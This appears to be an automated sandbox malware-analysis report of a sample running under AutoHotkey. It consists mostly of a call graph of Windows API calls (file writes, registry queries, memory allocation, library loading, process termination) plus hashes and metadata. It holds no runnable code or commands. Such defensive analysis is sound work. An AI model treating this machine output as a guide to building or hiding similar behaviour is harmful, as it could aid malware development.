105151->105152 105153 48758f8 CreateDirectoryA 105152->105153 105154 4844f29 11 API calls 105153->105154 105155 4875912 105154->105155 105155->105073 105156->104694 105157->104693 105158->104699 105159->104700 105160->104704 105161->104706 105162->104711 105163->104712 105164->104719 105165->104720 105167 48745b6 105166->105167 105168 487460b 105167->105168 105171 48745e1 CreateFileA 105167->105171 105169 4844f29 11 API calls 105168->105169 105170 4874620 Sleep 105169->105170 105170->104731 105171->105168 105172 48745ee WriteFile CloseHandle 105171->105172 105172->105168 105174 484399e 105173->105174 105175 48439a9 GetTickCount 105173->105175 105174->104744 105175->104744 105177 4847a58 105176->105177 105177->104777 105178->104830 105180 4844be4 105179->105180 105181 4844bae 105179->105181 105180->104088 105181->105180 105184 4894031 105181->105184 105198 48464a1 105181->105198 105185 489404f 105184->105185 105186 489409e 105184->105186 105202 48822dd GetDC GetDeviceCaps GetDeviceCaps 105185->105202 105187 4844f4d 11 API calls 105186->105187 105189 48940b8 105187->105189 105189->105181 105190 4894054 105205 4847031 105190->105205 105192 4894067 105211 487cacd 105192->105211 105195 4847031 42 API calls 105196 489408c 105195->105196 105197 487cacd 43 API calls 105196->105197 105197->105186 105199 48464b1 GetModuleFileNameA 105198->105199 105200 48464cd 105198->105200 105259 4846735 GetModuleFileNameA RegOpenKeyExA 105199->105259 105200->105181 105203 4882302 ReleaseDC 105202->105203 105203->105190 105206 4847042 105205->105206 105210 4847073 105205->105210 105206->105210 105216 48464e9 30 API calls 105206->105216 105208 4847062 LoadStringA 105209 4845019 11 API calls 105208->105209 105209->105210 105210->105192 105217 487c891 105211->105217 105216->105208 105218 487c8a6 105217->105218 105219 487c89a 105217->105219 105221 487c6d5 105218->105221 105232 487c555 105219->105232 105252 4845ed9 11 API calls 105221->105252 105223 487c709 105253 4848bf1 105223->105253 105226 4844f7d 11 API calls 105227 487c723 105226->105227 105228 4844f7d 11 API calls 105227->105228 105229 487c733 105228->105229 105230 4844f29 11 API calls 105229->105230 105231 487c757 105230->105231 105231->105195 105233 487c564 105232->105233 105234 4847031 42 API calls 105233->105234 105235 487c59c 105234->105235 105236 487c6d5 12 API calls 105235->105236 105237 487c5ab 105236->105237 105238 4847031 42 API calls 105237->105238 105239 487c5c0 105238->105239 105240 487c6d5 12 API calls 105239->105240 105241 487c5cf 105240->105241 105242 4847031 42 API calls 105241->105242 105243 487c5e4 105242->105243 105244 487c6d5 12 API calls 105243->105244 105245 487c5f3 105244->105245 105246 4847031 42 API calls 105245->105246 105247 487c608 105246->105247 105248 487c6d5 12 API calls 105247->105248 105249 487c617 105248->105249 105250 4844f4d 11 API calls 105249->105250 105251 487c631 105250->105251 105251->105218 105252->105223 105254 4848bff 105253->105254 105255 4845019 11 API calls 105254->105255 105256 4848c13 105255->105256 105257 4848c17 CharLowerBuffA 105256->105257 105258 4848c20 105256->105258 105257->105258 105258->105226 105260 48467b7 105259->105260 105261 4846777 RegOpenKeyExA 105259->105261 105277 484655d 12 API calls 105260->105277 105261->105260 105263 4846795 RegOpenKeyExA 105261->105263 105263->105260 105264 4846840 lstrcpyn GetThreadLocale GetLocaleInfoA 105263->105264 105268 4846877 105264->105268 105269 4846970 105264->105269 105265 48467dc RegQueryValueExA 105266 48467fc RegQueryValueExA 105265->105266 105267 484681e RegCloseKey 105265->105267 105266->105267 105270 484681a 105266->105270 105267->105200 105268->105269 105271 4846887 lstrlen 105268->105271 105269->105200 105270->105267 105272 48468a0 105271->105272 105272->105269 105273 48468ce lstrcpyn LoadLibraryExA 105272->105273 105274 48468fa 105272->105274 105273->105274 105274->105269 105275 4846904 lstrcpyn LoadLibraryExA 105274->105275 105275->105269 105276 484693a lstrcpyn LoadLibraryExA 105275->105276 105276->105269 105277->105265 105278 444de0 105279 444df5 RegisterWindowMessageW 105278->105279 105280 444e0c 105278->105280 105279->105280 105281 444ff5 105280->105281 105282 444e88 105280->105282 105287 444e4f 105280->105287 105285 445647 105281->105285 105286 445001 105281->105286 105283 444fd3 105282->105283 105284 444e8e 105282->105284 105428 445ab0 290 API calls 105283->105428 105289 444e9a 105284->105289 105369 445030 105284->105369 105290 4457e0 105285->105290 105291 445810 IsWindow 105285->105291 105292 4457b3 PostMessageW 105285->105292 105293 445783 105285->105293 105294 445833 GetCurrentProcessId 105285->105294 105295 4457f8 105285->105295 105307 4456eb 105285->105307 105322 445842 105285->105322 105325 445878 105285->105325 105329 445664 105285->105329 105285->105369 105301 4455eb 105286->105301 105303 445013 105286->105303 105304 445458 105286->105304 105297 444ef8 105289->105297 105298 445098 105289->105298 105299 444f28 105289->105299 105300 444ea8 105289->105300 105320 444ecf 105289->105320 105326 444f4f 105289->105326 105328 444f91 105289->105328 105361 444fea 105289->105361 105439 41eb40 121 API calls _wcsncpy 105290->105439 105318 44581e GetWindowTextW 105291->105318 105319 445828 105291->105319 105311 403c50 GetTickCount 105292->105311 105434 403c50 105293->105434 105440 41eb40 121 API calls _wcsncpy 105295->105440 105296 444fdf 105316 445586 DefWindowProcW 105296->105316 105296->105361 105297->105316 105323 444f07 105297->105323 105340 4450a9 105298->105340 105383 4450e9 105298->105383 105299->105316 105324 444f37 SetFocus 105299->105324 105300->105316 105317 444eb7 105300->105317 105302 4455fb PostMessageW 105301->105302 105327 44561a 105301->105327 105302->105327 105305 444f7b 105303->105305 105331 445025 105303->105331 105332 445402 105303->105332 105304->105301 105309 445465 105304->105309 105305->105316 105392 444f83 105305->105392 105306 445720 GetCurrentProcessId EnumWindows 105335 44574c 105306->105335 105336 445778 105306->105336 105307->105306 105333 44570e CloseClipboard 105307->105333 105334 4456fb GlobalUnlock 105307->105334 105338 4455a2 105309->105338 105339 44546e 105309->105339 105310 445488 Shell_NotifyIconW 105341 44549b Shell_NotifyIconW 105310->105341 105359 4454a8 105310->105359 105372 4457a5 105311->105372 105312 4454b6 RegisterWindowMessageW 105313 4454cd 105312->105313 105313->105316 105373 44552f inet_ntoa 105313->105373 105374 44553a 105313->105374 105423 41eb40 121 API calls _wcsncpy 105317->105423 105318->105319 105321 444eed 105320->105321 105424 41eb40 121 API calls _wcsncpy 105320->105424 105346 445866 105322->105346 105322->105361 105347 444f1d 105323->105347 105425 41eb40 121 API calls _wcsncpy 105323->105425 105325->105316 105442 40615c ioctlsocket 105325->105442 105326->105316 105426 4778f0 GetIconInfo GetObjectW DeleteObject DeleteObject 105326->105426 105349 445623 SendMessageTimeoutW 105327->105349 105350 44563c 105327->105350 105328->105316 105427 4779a0 DrawIconEx 105328->105427 105330 44569e 105329->105330 105351 4456a8 105329->105351 105352 445679 105329->105352 105330->105316 105330->105351 105331->105298 105353 445027 105331->105353 105355 44540a GetMenu CheckMenuItem 105332->105355 105332->105369 105333->105306 105334->105333 105433 484160 99 API calls 105335->105433 105363 4455ab 105338->105363 105376 4455c3 SendMessageTimeoutW 105338->105376 105339->105292 105339->105369 105357 4450c1 MoveWindow 105340->105357 105358 4450ae ShowWindow 105340->105358 105341->105359 105342 4457ed 105343 445805 105441 436e60 86 API calls _wcsncpy 105346->105441 105349->105350 105367 4456ce 105351->105367 105368 4456af PostMessageW 105351->105368 105352->105316 105366 445682 105352->105366 105353->105369 105370 445063 105353->105370 105355->105305 105355->105316 105356 44578c PostMessageW 105356->105372 105359->105312 105359->105313 105360 444ec4 105365 44588a 105365->105316 105443 406215 125 API calls _memmove 105365->105443 105431 477420 99 API calls 105366->105431 105380 4456d4 105367->105380 105381 4456e0 105367->105381 105369->105305 105369->105310 105369->105359 105370->105316 105388 445085 ShowWindow 105370->105388 105371 44575d 105371->105336 105382 445764 SetTimer 105371->105382 105372->105392 105373->105374 105384 445551 __itow 105374->105384 105375 44586f 105376->105363 105432 445d30 162 API calls __write_nolock 105380->105432 105382->105336 105383->105305 105383->105316 105393 445171 105383->105393 105394 445318 105383->105394 105429 408a81 141 API calls 2 library calls 105384->105429 105386 445693 105390 4456dd 105390->105381 105391 445573 105391->105316 105430 4061f2 125 API calls 105391->105430 105395 445176 105393->105395 105396 4451ee 105393->105396 105398 445336 GetClientRect 105394->105398 105401 4453f7 105394->105401 105395->105316 105403 445199 105395->105403 105406 445195 105395->105406 105399 4452e4 105396->105399 105400 4451f9 105396->105400 105402 445358 105398->105402 105399->105316 105404 4452ee GetClipBox FillRect 105399->105404 105413 445214 CreateCompatibleDC SelectObject BitBlt SelectObject DeleteDC 105400->105413 105414 445268 DrawIconEx 105400->105414 105405 4453c2 MoveWindow InvalidateRect 105402->105405 105408 44539e 105402->105408 105409 44538b MoveWindow 105402->105409 105407 4451b1 SetBkColor 105403->105407 105405->105401 105406->105403 105410 4451a9 GetSysColor 105406->105410 105411 4451c3 SetTextColor 105407->105411 105412 4451cb 105407->105412 105415 4453a5 MoveWindow 105408->105415 105416 4453bc 105408->105416 105409->105408 105410->105407 105411->105412 105417 4451d2 105412->105417 105418 4451dd GetSysColorBrush 105412->105418 105419 445283 ExcludeClipRect CreateRectRgn GetClipRgn 105413->105419 105414->105419 105415->105416 105416->105405 105420 4452be GetSysColorBrush 105419->105420 105421 4452ba 105419->105421 105422 4452c6 FillRgn DeleteObject 105420->105422 105421->105422 105423->105360 105424->105321 105425->105347 105426->105305 105427->105305 105428->105296 105429->105391 105430->105316 105431->105386 105432->105390 105433->105371 105435 403ca4 105434->105435 105436 403c59 105434->105436 105435->105356 105435->105392 105436->105435 105437 403c82 GetTickCount 105436->105437 105437->105435 105438 403c9d 105437->105438 105438->105435 105439->105342 105440->105343 105441->105375 105442->105365 105443->105305 105444 466382 105451 466290 105444->105451 105445 466510 105446 4664c9 GetTickCount 105448 4664df 105446->105448 105449 4664e8 SetTimer 105446->105449 105447 466495 105447->105445 105447->105446 105448->105445 105448->105449 105449->105445 105450 49a18d _free 46 API calls 105450->105447 105451->105447 105451->105450 105452 480dc0 105453 480de0 105452->105453 105459 480ded _wcschr __wopenfile 105452->105459 105454 480f2f 105454->105453 105455 480f35 FindFirstFileW 105454->105455 105455->105453 105457 480f51 FindClose 105455->105457 105456 480ea0 FindFirstFileW 105456->105453 105458 480ec9 FindClose 105456->105458 105457->105453 105458->105459 105459->105453 105459->105454 105459->105456 105460 487518d Sleep 105461 463c8d 105463 463c94 __write_nolock _memmove 105461->105463 105462 463cf7 105478 465cc0 105462->105478 105463->105462 105467 463992 105463->105467 105465 49a18d _free 46 API calls 105465->105467 105466 4658b5 105467->105465 105467->105466 105468 463d3b 105504 483a20 51 API calls 2 library calls 105468->105504 105470 463e0d 105505 466110 46 API calls 105470->105505 105472 46542a 105476 463e91 105476->105472 105506 45ad90 80 API calls 105476->105506 105507 41a5e0 57 API calls __wcstoi64 105476->105507 105508 49c2f2 57 API calls __wtof_l 105476->105508 105509 41a560 57 API calls __wcstoi64 105476->105509 105482 465ce6 105478->105482 105496 465d21 __crtGetStringTypeA_stat 105478->105496 105479 465dbe 105510 4517e0 105479->105510 105480 465e09 105493 465e58 105480->105493 105561 483b10 46 API calls _malloc 105480->105561 105481 465fb4 105485 466012 105481->105485 105487 465fc1 105481->105487 105488 465fcb 105481->105488 105560 4aae82 47 API calls 6 library calls 105482->105560 105497 466024 105485->105497 105567 40563f 49 API calls __realloc_crt 105485->105567 105486 465dd9 105486->105468 105563 477f60 52 API calls 3 library calls 105487->105563 105564 477df0 52 API calls _free 105488->105564 105493->105481 105498 465e5c 105493->105498 105501 482c40 62 API calls 105493->105501 105562 41aa10 82 API calls 105493->105562 105494 466002 105566 483650 46 API calls _free 105494->105566 105495 465fc9 105495->105494 105565 4792d0 49 API calls 2 library calls 105495->105565 105496->105479 105496->105480 105496->105498 105497->105486 105568 406023 129 API calls 2 library calls 105497->105568 105498->105468 105501->105493 105504->105470 105505->105476 105506->105476 105507->105476 105508->105476 105509->105476 105511 45181c 105510->105511 105513 451870 105510->105513 105512 45184a 105511->105512 105511->105513 105515 451823 105511->105515 105517 45183e 105511->105517 105512->105486 105513->105517 105576 45ac50 57 API calls __wcstoi64 105513->105576 105515->105517 105575 41a560 57 API calls __wcstoi64 105515->105575 105549 4518e1 _memset __crtGetStringTypeA_stat 105517->105549 105577 49a3aa 58 API calls 2 library calls 105517->105577 105519 451932 105523 451939 105519->105523 105578 49a3aa 58 API calls 2 library calls 105519->105578 105522 451c56 105524 451c65 105522->105524 105525 451c86 105522->105525 105523->105549 105579 4512b0 58 API calls 2 library calls 105523->105579 105588 45ad90 80 API calls 105524->105588 105569 451080 SetLastError 105525->105569 105528 451c75 105589 451590 12 API calls 2 library calls 105528->105589 105529 451c9b 105530 451cb6 105529->105530 105538 451d95 105529->105538 105590 43a620 123 API calls 2 library calls 105530->105590 105534 451c7b 105534->105525 105535 452112 105534->105535 105536 452120 105535->105536 105537 452119 FreeLibrary 105535->105537 105536->105486 105537->105536 105558 451d9b 105538->105558 105591 45bef0 54 API calls 105538->105591 105541 49a782 52 API calls 105541->105549 105542 4519ca 105542->105486 105545 45ad90 80 API calls 105545->105549 105546 451e36 105592 4098f8 52 API calls 105546->105592 105548 404010 56 API calls 105548->105549 105549->105522 105549->105538 105549->105541 105549->105542 105549->105545 105549->105548 105549->105558 105580 4512b0 58 API calls 2 library calls 105549->105580 105581 47d380 54 API calls 2 library calls 105549->105581 105582 409b67 52 API calls ctype 105549->105582 105583 45ace0 57 API calls __wcstoi64 105549->105583 105584 49a08b 57 API calls wcstoxq 105549->105584 105585 41a560 57 API calls __wcstoi64 105549->105585 105586 49a060 57 API calls wcstoxq 105549->105586 105587 49a0d8 57 API calls __wcstoi64 105549->105587 105556 451e59 105593 45be60 46 API calls 2 library calls 105556->105593 105558->105535 105594 405160 18 API calls 105558->105594 105595 409d17 49 API calls 3 library calls 105558->105595 105596 483ed0 69 API calls 105558->105596 105560->105496 105561->105493 105562->105493 105563->105495 105564->105495 105565->105494 105566->105485 105567->105497 105568->105486 105570 45114e VirtualAlloc 105569->105570 105573 4510e0 105569->105573 105571 451180 GetLastError 105570->105571 105574 4511d3 __itow __ultow 105571->105574 105573->105570 105574->105529 105575->105517 105576->105517 105577->105519 105578->105523 105579->105549 105580->105549 105581->105549 105582->105549 105583->105549 105584->105549 105585->105549 105586->105549 105587->105549 105588->105528 105589->105534 105590->105542 105591->105546 105592->105556 105593->105558 105594->105558 105595->105558 105596->105558 105597 4843489 105598 48434b1 105597->105598 105599 484349e 105597->105599 105601 48434d2 105598->105601 105602 48434c8 RtlEnterCriticalSection 105598->105602 105626 48426a5 RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 105599->105626 105613 4843285 13 API calls 105601->105613 105602->105601 105604 48434a3 105604->105598 105606 48434a7 105604->105606 105605 48434db 105607 48434df 105605->105607 105614 4842f01 105605->105614 105609 4843537 RtlLeaveCriticalSection 105607->105609 105610 4843541 105607->105610 105609->105610 105611 48434eb 105611->105607 105627 48430ad 9 API calls 105611->105627 105613->105605 105615 4842f13 105614->105615 105616 4842f1c 105614->105616 105634 48426a5 RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 105615->105634 105618 4842f45 RtlEnterCriticalSection 105616->105618 105620 4842f4f 105616->105620 105625 4842f24 105616->105625 105618->105620 105619 4842f18 105619->105616 105619->105625 105620->105625 105628 4842db9 105620->105628 105623 4843092 RtlLeaveCriticalSection 105624 484309c 105623->105624 105624->105611 105625->105611 105626->105604 105627->105607 105632 4842dd0 105628->105632 105629 4842e11 105633 4842e38 105629->105633 105640 4842b51 105629->105640 105632->105629 105632->105633 105635 4842d21 105632->105635 105633->105623 105633->105624 105634->105619 105644 4842425 105635->105644 105637 4842d31 105638 4842d3e 105637->105638 105653 4842c95 9 API calls 105637->105653 105638->105632 105641 4842bec 105640->105641 105642 4842b76 105640->105642 105641->105642 105669 4842a95 105641->105669 105642->105633 105645 4842443 105644->105645 105647 4842451 105645->105647 105650 48424b1 105645->105650 105652 484245f 105645->105652 105658 4842105 105645->105658 105666 4841fb9 LocalAlloc 105645->105666 105654 48422a9 105647->105654 105667 48421e1 VirtualFree 105650->105667 105652->105637 105653->105638 105656 48422fc 105654->105656 105655 484234b 105655->105652 105656->105655 105657 4842332 VirtualAlloc 105656->105657 105657->105655 105657->105656 105659 4842114 VirtualAlloc 105658->105659 105661 4842164 105659->105661 105662 4842141 105659->105662 105661->105645 105668 4841f29 LocalAlloc 105662->105668 105664 484214d 105664->105661 105665 4842151 VirtualFree 105664->105665 105665->105661 105666->105645 105667->105652 105668->105664 105671 4842aa9 105669->105671 105670 4842b45 105670->105642 105671->105670 105672 4842af7 105671->105672 105673 4842ae1 105671->105673 105675 4842611 3 API calls 105672->105675 105682 4842611 105673->105682 105676 4842af5 105675->105676 105676->105670 105692 4842955 9 API calls 105676->105692 105678 4842b18 105679 4842b3a 105678->105679 105693 48429b5 9 API calls 105678->105693 105694 4842041 LocalAlloc 105679->105694 105683 4842698 105682->105683 105684 484263b 105682->105684 105683->105676 105695 4842369 105684->105695 105688 484265c 105689 4842673 105688->105689 105700 48421e1 VirtualFree 105688->105700 105689->105683 105701 4842041 LocalAlloc 105689->105701 105692->105678 105693->105679 105694->105670 105698 48423ba 105695->105698 105696 484241b 105699 4841fb9 LocalAlloc 105696->105699 105697 48423ec VirtualFree 105697->105698 105698->105696 105698->105697 105699->105688 105700->105689 105701->105683 105702 4875749 105703 4875760 TerminateProcess 105702->105703 105704 41d690 105705 41d8e1 _memset 105704->105705 105715 4761c0 105705->105715 105707 41d998 InitializeCriticalSection OleInitialize 105708 41d8f9 105711 41d91f 105708->105711 105725 41eb40 121 API calls _wcsncpy 105708->105725 105711->105707 105726 42d170 58 API calls 2 library calls 105711->105726 105712 41d94a 105714 41d96f 105712->105714 105727 42d420 87 API calls 5 library calls 105712->105727 105714->105707 105716 4761ec 105715->105716 105717 4761cc 105715->105717 105716->105708 105717->105716 105717->105717 105718 49a0ee _malloc 46 API calls 105717->105718 105720 4761fe 105718->105720 105719 476283 105719->105708 105720->105719 105721 49a782 52 API calls 105720->105721 105722 476226 105721->105722 105723 47622d 105722->105723 105724 49a18d _free 46 API calls 105722->105724 105723->105708 105724->105719 105725->105711 105726->105712 105727->105714 105728 431035 105729 43108a 105728->105729 105730 43103f 105728->105730 105733 43109f 105729->105733 105741 4310e4 105729->105741 105745 431060 105729->105745 105731 431044 105730->105731 105732 43106c 105730->105732 105736 41afd0 59 API calls 105731->105736 105731->105745 105734 41afd0 59 API calls 105732->105734 105811 499c29 58 API calls 2 library calls 105733->105811 105734->105745 105736->105745 105737 431144 105812 41cea0 57 API calls __fassign 105737->105812 105738 431189 105746 43114f 105738->105746 105813 41cea0 57 API calls __fassign 105738->105813 105739 4310aa 105742 41afd0 59 API calls 105739->105742 105739->105745 105744 41afd0 59 API calls 105741->105744 105741->105745 105742->105745 105744->105745 105745->105737 105745->105738 105745->105746 105747 4313d0 105746->105747 105748 431276 105746->105748 105749 4312c5 105746->105749 105750 4312fb 105746->105750 105751 43140a 105746->105751 105752 4312de 105746->105752 105753 43133c 105746->105753 105760 43513b 105746->105760 105794 430a54 105746->105794 105822 437890 147 API calls 2 library calls 105747->105822 105761 431284 105748->105761 105814 42cc50 57 API calls __wcstoi64 105748->105814 105815 4371e0 130 API calls __wcstoi64 105749->105815 105817 499c29 58 API calls 2 library calls 105750->105817 105755 431416 105751->105755 105756 431438 105751->105756 105816 4373e0 131 API calls _free 105752->105816 105803 404140 GetCPInfo 105753->105803 105763 41afd0 59 API calls 105755->105763 105764 41afd0 59 API calls 105756->105764 105796 437070 105761->105796 105769 431426 105763->105769 105764->105769 105765 43130c 105770 431330 105765->105770 105771 431324 105765->105771 105766 431348 105788 4313a2 105766->105788 105820 47da40 48 API calls 105766->105820 105776 43145e 105769->105776 105769->105794 105819 438630 130 API calls 6 library calls 105770->105819 105818 438330 130 API calls 5 library calls 105771->105818 105823 437f20 138 API calls __write_nolock 105776->105823 105777 43137a 105777->105788 105821 438940 131 API calls 3 library calls 105777->105821 105778 430a8e GetTickCount 105782 430aaa PeekMessageW 105778->105782 105778->105794 105780 430a66 GlobalUnlock 105781 430a7c CloseClipboard 105780->105781 105781->105778 105785 430ad0 GetTickCount 105782->105785 105786 430ac4 105782->105786 105783 431491 105787 43149a RegCloseKey 105783->105787 105783->105794 105785->105794 105789 430acd 105786->105789 105787->105794 105804 404190 105788->105804 105789->105785 105790 430b87 GetTickCount 105791 430bb6 105790->105791 105790->105794 105791->105794 105793 44df90 58 API calls 105793->105794 105794->105778 105794->105780 105794->105781 105794->105790 105794->105793 105795 430d54 105794->105795 105810 406023 129 API calls 2 library calls 105794->105810 105797 437080 105796->105797 105798 4370ef 105797->105798 105799 43712b GetTickCount 105797->105799 105824 406023 129 API calls 2 library calls 105797->105824 105825 45a910 57 API calls 105797->105825 105798->105794 105799->105797 105800 43715a 105799->105800 105800->105797 105803->105766 105808 4041c2 105804->105808 105805 404200 105807 40421a 105805->105807 105809 49a18d _free 46 API calls 105805->105809 105806 4041f9 FindCloseChangeNotification 105806->105805 105807->105794 105808->105805 105808->105806 105809->105807 105810->105794 105811->105739 105812->105746 105813->105746 105814->105761 105815->105791 105816->105794 105817->105765 105818->105794 105819->105794 105820->105777 105821->105788 105822->105794 105823->105783 105824->105797 105825->105797 105826 47d6d0 105827 47d6dc 105826->105827 105829 47d6e2 105826->105829 105828 49a0ee _malloc 46 API calls 105827->105828 105828->105829 105830 48456bd 105831 48456c5 SysAllocStringLen 105830->105831 105832 48455c9 105830->105832 105833 48456d5 SysFreeString 105831->105833 105834 4845599 105831->105834 105835 48455dd 105832->105835 105836 48455cf SysFreeString 105832->105836 105836->105835 105837 40155b 105838 40156b 105837->105838 105839 401578 105838->105839 105902 403620 joyGetPosEx PostMessageW 105838->105902 105841 401593 105839->105841 105842 401585 105839->105842 105845 4015b8 SetTimer 105841->105845 105894 4015d5 _wcsncpy 105841->105894 105903 4033f0 88 API calls _wcsncpy 105842->105903 105844 40158a 105844->105841 105845->105894 105846 4015e3 GetTickCount 105846->105894 105847 403c50 GetTickCount 105848 401618 GetMessageW 105847->105848 105848->105846 105849 40163b GetTickCount 105848->105849 105849->105894 105850 4016d4 GetFocus 105850->105894 105851 401d9a GetForegroundWindow 105852 401daa GetWindowThreadProcessId 105851->105852 105851->105894 105858 401dbf GetClassNameW 105852->105858 105852->105894 105854 4031c1 TranslateAcceleratorW 105854->105846 105855 4031db TranslateMessage DispatchMessageW 105854->105855 105855->105846 105857 401d6f ShowWindow 105857->105846 105858->105894 105860 401ca4 IsDialogMessageW 105860->105894 105867 403150 IsDialogMessageW 105867->105894 105868 4033b0 GetTickCount 105896 4017ae _wcsncpy 105868->105896 105869 401713 TranslateAcceleratorW 105869->105846 105869->105894 105870 403193 SetCurrentDirectoryW 105870->105894 105871 401ed3 105872 402055 DragQueryFileW 105872->105894 105873 402076 DragFinish 105873->105846 105874 401c3f SendMessageW 105874->105846 105875 401440 GetDlgCtrlID GetParent GetDlgCtrlID 105875->105894 105876 402441 DragFinish 105876->105894 105877 401e7e 105877->105871 105885 401ec1 KillTimer 105877->105885 105878 402484 DragFinish 105878->105894 105879 401c59 SendMessageW 105879->105846 105881 401b6c GetKeyState 105882 401b82 GetKeyState 105881->105882 105881->105894 105882->105894 105883 40255d GetTickCount 105883->105894 105885->105871 105886 401a87 GetKeyState 105886->105894 105887 401bca GetWindowLongW 105889 401bdc SendMessageW 105887->105889 105887->105894 105888 401c00 SendMessageW 105888->105846 105889->105846 105891 40239c GetTickCount 105891->105846 105892 401aac GetWindowLongW 105892->105894 105893 401aeb IsWindowEnabled 105893->105894 105894->105846 105894->105847 105894->105850 105894->105851 105894->105854 105894->105855 105894->105857 105894->105860 105894->105867 105894->105869 105894->105870 105894->105872 105894->105873 105894->105874 105894->105875 105894->105876 105894->105878 105894->105879 105894->105881 105894->105886 105894->105887 105894->105888 105894->105891 105894->105892 105894->105893 105894->105896 105898 401b0a GetKeyState 105894->105898 105904 485200 GetWindowLongW GetParent GetWindowLongW 105894->105904 105905 466ee0 GetWindowLongW GetParent 105894->105905 105907 41eb40 121 API calls _wcsncpy 105894->105907 105908 403620 joyGetPosEx PostMessageW 105894->105908 105911 40f2b0 123 API calls 105894->105911 105913 43f630 85 API calls 105894->105913 105914 40fe60 123 API calls 105894->105914 105896->105846 105896->105868 105896->105877 105896->105883 105896->105891 105896->105894 105899 4741a0 165 API calls 105896->105899 105906 470820 PostMessageW 105896->105906 105909 4033f0 88 API calls _wcsncpy 105896->105909 105910 4707c0 ShowWindow 105896->105910 105912 412480 309 API calls 2 library calls 105896->105912 105915 401060 77 API calls 105896->105915 105916 403a70 SetCurrentDirectoryW GetTickCount LoadImageW Shell_NotifyIconW 105896->105916 105917 4102b0 125 API calls __write_nolock 105896->105917 105918 403b80 48 API calls 2 library calls 105896->105918 105897 4025de GetTickCount 105897->105896 105898->105896 105899->105896 105902->105839 105903->105844 105904->105894 105905->105894 105906->105896 105907->105894 105908->105894 105909->105896 105910->105896 105911->105894 105912->105896 105913->105894 105914->105894 105915->105896 105916->105897 105917->105896 105918->105896 105919 4661ba 105920 4661c7 105919->105920 105921 4661dc 105920->105921 105922 49a18d _free 46 API calls 105920->105922 105923 49a0ee _malloc 46 API calls 105921->105923 105922->105921 105925 4661f6 105923->105925 105924 466202 105925->105924 105926 466495 105925->105926 105931 49a18d _free 46 API calls 105925->105931 105927 466510 105926->105927 105928 4664c9 GetTickCount 105926->105928 105929 4664df 105928->105929 105930 4664e8 SetTimer 105928->105930 105929->105927 105929->105930 105930->105927 105931->105926 105932 44c1d9 105947 44c0b1 105932->105947 105933 44c26a CreateFileW 105934 44c2a5 105933->105934 105935 44c28a GetLastError 105933->105935 105979 4810b0 GetFileSize 105934->105979 105950 44c17d 105935->105950 105940 44c2b7 GetLastError CloseHandle 105941 44c2d6 105940->105941 105942 44c2fb 105944 44c2e0 105944->105942 105945 44c355 105944->105945 105946 44c320 CloseHandle 105944->105946 105949 44c3aa 105945->105949 105958 44c371 105945->105958 105948 44c334 105946->105948 105947->105933 105947->105950 105982 404010 56 API calls 105947->105982 105983 49a08b 57 API calls wcstoxq 105947->105983 105984 49a0b7 47 API calls __fassign 105947->105984 105951 49a0ee _malloc 46 API calls 105949->105951 105952 44c3b8 105951->105952 105953 44c3c1 105952->105953 105954 44c3e8 ReadFile GetLastError FindCloseChangeNotification 105952->105954 105960 44c3d5 CloseHandle 105953->105960 105955 44c418 105954->105955 105962 44c585 105954->105962 105956 44c423 105955->105956 105957 44c51e 105955->105957 105961 44c456 105956->105961 105968 44c43d 105956->105968 105963 44c533 105957->105963 105978 44c4e8 105957->105978 105958->105954 105959 44c397 CloseHandle 105958->105959 105973 44c39e 105959->105973 105974 44c454 105961->105974 105987 483ed0 69 API calls 105961->105987 105964 49a18d _free 46 API calls 105962->105964 105962->105978 105988 483160 16 API calls 105963->105988 105964->105978 105985 483ed0 69 API calls 105968->105985 105969 44c53f 105971 49a18d _free 46 API calls 105969->105971 105972 44c54f 105971->105972 105972->105948 105975 49a18d _free 46 API calls 105974->105975 105976 44c4a2 105974->105976 105975->105976 105976->105978 105986 480750 59 API calls 3 library calls 105976->105986 105989 41a8f0 18 API calls 105978->105989 105980 4810d0 GetLastError 105979->105980 105981 44c2ac 105979->105981 105980->105981 105981->105940 105981->105944 105982->105947 105983->105947 105984->105947 105985->105974 105986->105978 105987->105974 105988->105969 105989->105973

                                      Executed Functions

                                      Function 004014E4 Relevance: 76.3, APIs: 40, Strings: 3, Instructions: 1095windowtimeclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040150F
                                      • CloseClipboard.USER32 ref: 0040151B
                                      • SetTimer.USER32(0002044A,00000009,0000000A), ref: 004015C4
                                      • GetTickCount.KERNEL32 ref: 004015E9
                                      • GetMessageW.USER32(?,00000000,00000000,-00000311), ref: 00401630
                                      • GetTickCount.KERNEL32 ref: 0040163B
                                      • GetFocus.USER32 ref: 004016D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseFocusGlobalMessageTimerUnlock
                                      • String ID: #32770$6Dd$8&
                                      • API String ID: 2919891889-3320845119
                                      • Opcode ID: d66acf2f5b038708fbdfcca2c87ba31abefd78b60b051c17a0b86c35794dbe50
                                      • Instruction ID: c40d62707e414facf4d416d366af1b78ea6665447dcfaa81340ce19929726241
                                      • Opcode Fuzzy Hash: d66acf2f5b038708fbdfcca2c87ba31abefd78b60b051c17a0b86c35794dbe50
                                      • Instruction Fuzzy Hash: BC929F709083419BDB24DF24C98876B77E1AB85304F18457FE985AB3E1D7B8EC41CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04846735 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
